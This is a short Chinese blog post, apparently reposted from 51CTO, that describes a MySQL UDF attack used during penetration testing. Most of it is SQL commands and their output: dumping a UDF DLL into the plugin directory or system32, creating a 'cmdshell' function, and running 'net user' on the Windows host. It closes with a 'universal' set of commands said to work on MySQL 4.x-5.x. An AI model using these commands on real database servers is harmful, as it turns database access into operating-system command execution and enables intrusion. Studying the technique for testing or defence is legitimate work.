mysql udf方法更新

最近渗透时要用mysql udf,发现导出system32下的方法注册不了DLL,原来一些mysql新版变到插件目录了。

mysql> select @@version;
+———–+
| @@version |
+———–+
| 5.1.41 |
+———–+
1 row in set (0.00 sec)

mysql> select data from shell into DUMPFILE ‘.\\lib\\plugin\\UDF.DLL’;

 

ERROR 1 (HY000): Can’t create/write to file ‘\Program Files\xampp\mysql\data\lib\plugin\UDF.DLL’ (Errcode: 2)
mysql>

用这方法暴出了插件的安装目录.下面是通用的导出方法:

mysql> select data from shell into DUMPFILE ‘..\\lib\\plugin\\UDF.DLL’;
Query OK, 1 row affected (0.00 sec)
………………
mysql> select cmdshell(‘cmd.exe /c net user’);

 

\\ 的用户帐户

——————————————————————————-

__vmware_user__ Administrator ASPNET
Guest HelpAssistant SUPPORT_388945a0
把你的mysqludf改为:
select data from shell into DUMPFILE ‘..\\lib\\plugin\\UDF.DLL’;
select data from shell into DUMPFILE ‘c:\\windows\\system32\\UDF.DLL’;
select data from shell into DUMPFILE ‘c:\\UDF.DLL’; //某些版本只能在C盘根目录
Create Function cmdshell returns string soname ‘UDF.DLL’;
这样就比较通用了,对4.x-5.x都有效












本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/479662 ,如需转载请自行联系原作者
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值